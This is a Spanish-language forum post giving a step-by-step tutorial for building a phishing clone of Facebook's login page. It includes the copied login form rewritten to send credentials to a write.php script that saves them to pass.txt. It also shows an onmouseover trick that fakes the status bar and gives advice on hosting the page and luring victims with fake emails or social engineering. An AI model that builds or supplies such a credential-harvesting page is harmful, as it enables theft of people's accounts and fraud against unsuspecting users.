Autor
.
.
.
Todo lo que viene a continuación esta hecho con fines educativos y el autor no se hace responsable por el mal uso que se hicieren de este material...
Cosas que vamos a necesitar:
+Conocimietos basicos de html y php
+Archivo index.htm con la fake page
+Archivo write.php con el script capture pass
+Archivo pass.txt donde se guardaran las pass
Paso1.-
Abrimos con el firefox la página objetivo, en este caso el www dot f a c e b o o k dot com
Paso2.-
Abrimos el source code, copiamos todo en un notepad y lo guardamos con el nombre y extención: index.htm
3.-Buscamos los campos el formulario donde se pone el user y pass.
Código:
<form method=GET action=write.php id="https://login.facebook.com/login.php?login_attempt=1" id="login_form" id=" Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" name="lsd" value="nu3-U" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="es_LA" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Dirección de correo electrónico</label></td><td class="html7magic"><label for="pass">Contraseña</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u010237_3"><input value="Entrar" tabindex="4" type="submit" id="u010237_3" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">No cerrar sesión</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">¿Has olvidado tu contraseña?</a></td></tr></table><input type="hidden" name="charset_test" value="€,´,€,´,水,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="nu3-U" autocomplete="off" /></form>
4.- Editamos donde empieza el form y cambiamos:
Código:
<form method=GET action=write.php
5.- Editamos en el boton imput entrar:
Código:
<input value="Entrar" onmouseover="window.status='www.facebook.com';return true" onmouseout="window.status='';return true" tabindex="4" type="submit" id="u010237_3" />
no pongo todo el code pq es muuuy largo
6.- buscamos un hosting gratis ó en alguno que tengamos corriendo nuestra shell y los subimos (este ejemplo: esta testeado en m i a r r o b a)
7.-En nuestro host creamos el archivo pass.txt (donde se guardaran las contraseñas)
8.-Ahora tenemos hecho el 50% del trabajo, toca hacer el fakemail, launcher ó xploit. Aunque un poco de ing. social funciona.
Nota.- No necesariamente tiene que ser en un txt donde guardes los passwords ya que puedes mandarlo a un correo, celular ó guardar los datos a una base de datos. Como ven no tiene mucha ciencia los cripts en si.
Ahhh y tampoco garantiza el 100% de efectividad por ejemplo si la victima ve la URL: xD ya fue..... te pillaron xDDDD
Si bien hay mejores versiones de phishing a fb, esta es la mía y esta en español
y solo quería comprobar lo que se puede hacer
En línea
the way it's meant to be played...
